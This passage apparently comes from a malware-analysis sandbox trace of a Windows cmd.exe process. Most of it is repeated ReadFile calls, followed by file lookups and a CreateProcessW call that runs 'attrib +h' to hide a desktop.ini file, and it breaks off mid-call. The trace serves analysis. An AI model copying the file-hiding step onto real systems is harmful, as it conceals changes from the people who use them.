nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.971] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.972] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.972] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.972] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.972] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.972] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.972] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.972] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.972] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.972] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.972] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.972] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.972] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.972] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.973] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.973] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.973] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.973] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.973] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.973] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.973] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.973] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.973] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.973] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.973] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.973] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.973] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.974] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.974] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.974] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.974] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.974] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.974] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.974] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.974] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.974] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.974] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.974] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.975] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.975] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.975] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.975] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.975] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.975] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.975] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.975] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.975] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.975] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.975] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.975] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.975] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.976] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.976] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.976] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.976] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.976] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.976] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.976] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.976] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.976] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.976] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.976] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.976] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.976] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.976] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.977] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.977] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.977] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.977] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.977] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.977] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.977] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.977] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.977] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.977] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.977] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.977] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.977] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.978] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.978] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.978] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.978] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.978] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.996] _close (_FileHandle=4) returned 0 [0128.996] FindNextFileW (in: hFindFile=0x34e760, lpFindFileData=0x2af0a0 | out: lpFindFileData=0x2af0a0) returned 0 [0128.997] GetLastError () returned 0x12 [0128.997] FindClose (in: hFindFile=0x34e760 | out: hFindFile=0x34e760) returned 1 [0128.997] _dup2 (_FileHandleSrc=3, _FileHandleDst=1) returned 0 [0128.999] _close (_FileHandle=3) returned 0 [0129.000] GetConsoleTitleW (in: lpConsoleTitle=0x2af4d8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0129.000] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0129.000] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0129.000] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0129.000] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\attrib.*", fInfoLevelId=0x1, lpFindFileData=0x2aed74, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2aed74) returned 0xffffffff [0129.000] GetLastError () returned 0x2 [0129.000] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\attrib", fInfoLevelId=0x1, lpFindFileData=0x2aed74, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2aed74) returned 0xffffffff [0129.000] GetLastError () returned 0x2 [0129.000] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.*", fInfoLevelId=0x1, lpFindFileData=0x2aed74, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2aed74) returned 0x352ed0 [0129.000] FindClose (in: hFindFile=0x352ed0 | out: hFindFile=0x352ed0) returned 1 [0129.001] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.COM", fInfoLevelId=0x1, lpFindFileData=0x2aed74, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2aed74) returned 0xffffffff [0129.001] GetLastError () returned 0x2 [0129.001] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.EXE", fInfoLevelId=0x1, lpFindFileData=0x2aed74, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2aed74) returned 0x352ed0 [0129.001] FindClose (in: hFindFile=0x352ed0 | out: hFindFile=0x352ed0) returned 1 [0129.001] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0129.001] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0129.001] GetConsoleTitleW (in: lpConsoleTitle=0x2af26c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0129.001] InitializeProcThreadAttributeList (in: lpAttributeList=0x2af0f4, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x2af1bc | out: lpAttributeList=0x2af0f4, lpSize=0x2af1bc) returned 1 [0129.001] UpdateProcThreadAttribute (in: lpAttributeList=0x2af0f4, dwFlags=0x0, Attribute=0x60001, lpValue=0x2af1b4, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x2af0f4, lpPreviousValue=0x0) returned 1 [0129.001] GetStartupInfoW (in: lpStartupInfo=0x2af0b0 | out: lpStartupInfo=0x2af0b0*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0129.001] lstrcmpW (lpString1="\\attrib.exe", lpString2="\\XCOPY.EXE") returned -1 [0129.001] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\attrib.exe", lpCommandLine="attrib +h \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\WXMD5U~1\\desktop.ini\" ", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\EEBsYm5\\Desktop", lpStartupInfo=0x2af150*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="attrib +h 